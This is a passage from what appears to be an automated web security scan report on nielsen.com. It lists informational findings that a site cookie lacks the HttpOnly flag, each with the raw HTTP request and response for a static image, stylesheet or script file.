Cookie: __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3D%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7C; Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:54 GMT
ETag: "e78050-57e-4ad7b8c57f580"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: image/x-icon

[binary image/x-icon body, 1406 bytes, not shown]

4.15. http://nielsen.com/content/dam/corporate/shared/images/backgrounds/1pxGradient_blue.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/corporate/shared/images/backgrounds/1pxGradient_blue.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/corporate/shared/images/backgrounds/1pxGradient_blue.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:01:58 GMT
ETag: "e78099-99-4ad7b90288580"
Accept-Ranges: bytes
Content-Length: 153
Content-Type: image/gif

[binary image/gif body, 153 bytes, not shown; it begins with the GIF89a signature, consistent with the declared Content-Type]

4.16. http://nielsen.com/content/dam/corporate/shared/images/backgrounds/1px_gray_gradient_bkg.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/corporate/shared/images/backgrounds/1px_gray_gradient_bkg.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/corporate/shared/images/backgrounds/1px_gray_gradient_bkg.png HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:01:58 GMT
ETag: "e78098-169-4ad7b90288580"
Accept-Ranges: bytes
Content-Length: 361
Content-Type: image/png

[binary image/png body, 361 bytes, not shown; it begins with the PNG signature, consistent with the declared Content-Type]

4.17. http://nielsen.com/content/dam/corporate/shared/images/backgrounds/blue-arrow-on-gray.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/corporate/shared/images/backgrounds/blue-arrow-on-gray.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/corporate/shared/images/backgrounds/blue-arrow-on-gray.png HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:54 GMT
ETag: "be80b3-fb-4ad7c1b650d80"
Accept-Ranges: bytes
Content-Length: 251
Content-Type: image/png

[binary image/png body, 251 bytes, not shown; it begins with the PNG signature, consistent with the declared Content-Type]

4.18. http://nielsen.com/content/dam/corporate/shared/images/backgrounds/right_arrow.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/corporate/shared/images/backgrounds/right_arrow.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/corporate/shared/images/backgrounds/right_arrow.png HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:54 GMT
ETag: "e7804d-100-4ad7b8c57f580"
Accept-Ranges: bytes
Content-Length: 256
Content-Type: image/png

[binary image/png body, 256 bytes, not shown; it begins with the PNG signature, consistent with the declared Content-Type]

4.19. http://nielsen.com/content/dam/corporate/shared/images/icons/misc_icons/email-link.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/corporate/shared/images/icons/misc_icons/email-link.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/corporate/shared/images/icons/misc_icons/email-link.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:36 GMT
ETag: "be806b-65c-4ad7c1a526500"
Accept-Ranges: bytes
Content-Length: 1628
Content-Type: image/gif

[binary image/gif body, 1628 bytes, not shown; it begins with the GIF89a signature, consistent with the declared Content-Type]

4.20. http://nielsen.com/content/dam/corporate/shared/images/icons/misc_icons/facebook.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/corporate/shared/images/icons/misc_icons/facebook.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/corporate/shared/images/icons/misc_icons/facebook.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:52 GMT
ETag: "be80ab-62a-4ad7c1b468900"
Accept-Ranges: bytes
Content-Length: 1578
Content-Type: image/gif

[binary image/gif body, 1578 bytes, not shown; it begins with the GIF89a signature, consistent with the declared Content-Type]

4.21. http://nielsen.com/content/dam/corporate/shared/images/icons/misc_icons/linkedin.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/corporate/shared/images/icons/misc_icons/linkedin.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/corporate/shared/images/icons/misc_icons/linkedin.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:54 GMT
ETag: "e78043-652-4ad7b8c57f580"
Accept-Ranges: bytes
Content-Length: 1618
Content-Type: image/gif

[binary image/gif body, 1618 bytes, not shown; it begins with the GIF89a signature, consistent with the declared Content-Type]

4.22. http://nielsen.com/content/dam/corporate/shared/images/icons/misc_icons/search.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/corporate/shared/images/icons/misc_icons/search.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/corporate/shared/images/icons/misc_icons/search.png HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:36 GMT
ETag: "be806c-c2b-4ad7c1a526500"
Accept-Ranges: bytes
Content-Length: 3115
Content-Type: image/png

[binary image/png body, 3115 bytes, not shown; it begins with the PNG signature, consistent with the declared Content-Type, and carries an embedded Photoshop ICC profile chunk]

4.23. http://nielsen.com/content/dam/corporate/shared/images/icons/misc_icons/twit.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/corporate/shared/images/icons/misc_icons/twit.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/corporate/shared/images/icons/misc_icons/twit.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:31 GMT
ETag: "be804b-655-4ad7c1a0619c0"
Accept-Ranges: bytes
Content-Length: 1621
Content-Type: image/gif

[binary image/gif body, 1621 bytes, not shown; it begins with the GIF89a signature, consistent with the declared Content-Type]

4.24. http://nielsen.com/content/dam/corporate/us/en/graphix/icons/goldKey.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/corporate/us/en/graphix/icons/goldKey.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/corporate/us/en/graphix/icons/goldKey.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:31 GMT
ETag: "be804c-dba-4ad7c1a0619c0"
Accept-Ranges: bytes
Content-Length: 3514
Content-Type: image/gif

[binary image/gif body, 3514 bytes, not shown; it begins with the GIF89a signature, consistent with the declared Content-Type]

4.25. http://nielsen.com/content/dam/corporate/us/en/graphix/icons/world_icon.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/corporate/us/en/graphix/icons/world_icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/corporate/us/en/graphix/icons/world_icon.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:52 GMT
ETag: "be80b0-429-4ad7c1b468900"
Accept-Ranges: bytes
Content-Length: 1065
Content-Type: image/gif

GIF89a..........................................................n..........................v..................................................{.............................s...........................
...[SNIP]...

4.26. http://nielsen.com/content/dam/css/corporate/addons.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/css/corporate/addons.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Nielsen.com-cookie

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/css/corporate/addons.css HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:58 GMT
ETag: "e78056-9f4-4ad7b8c94fe80"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Content-Length: 2548

/* Addons to Corporate template stylesheet

Currently Deployed on:
United States (en)
Turkey (en)
Canada (en)

*/

/* Contact Us/Apply Now Button */
.contact_us {
   background:url('/content
...[SNIP]...

4.27. http://nielsen.com/content/dam/css/corporate/clearfix.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/dam/css/corporate/clearfix.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Nielsen.com-cookie

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/dam/css/corporate/clearfix.css HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:53 GMT
ETag: "e78036-87-4ad7b8c48b340"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Content-Length: 135

/* This CSS file inserts a clearing mechanism into the "sam" (reference component) div */

#sam {
   overflow:hidden;
   width:100%;
}

4.28. http://nielsen.com/etc/clientlibs/foundation/jquery.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/clientlibs/foundation/jquery.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Nielsen.com-cookie

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/clientlibs/foundation/jquery.js HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:39 GMT
ETag: "be8086-2cc58-4ad7c1a802bc0"
Accept-Ranges: bytes
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 183384

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

4.29. http://nielsen.com/etc/clientlibs/foundation/librarymanager.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/clientlibs/foundation/librarymanager.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Nielsen.com-cookie

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/clientlibs/foundation/librarymanager.js HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:52 GMT
ETag: "e78028-2b83-4ad7b8c397100"
Accept-Ranges: bytes
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 11139

/*
* Copyright 1997-2010 Day Management AG
* Barfuesserplatz 6, 4001 Basel, Switzerland
* All Rights Reserved.
*
* This software is the confidential and proprietary information of
* Day Manageme
...[SNIP]...

4.30. http://nielsen.com/etc/clientlibs/foundation/shared.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/clientlibs/foundation/shared.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Nielsen.com-cookie

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/clientlibs/foundation/shared.js HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:50 GMT
ETag: "be80ac-cc1c-4ad7c1b280480"
Accept-Ranges: bytes
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 52252

/*
* Copyright 1997-2010 Day Management AG
* Barfuesserplatz 6, 4001 Basel, Switzerland
* All Rights Reserved.
*
* This software is the confidential and proprietary information of
* Day Manageme
...[SNIP]...

4.31. http://nielsen.com/etc/designs/corporate.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Nielsen.com-cookie

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate.css HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
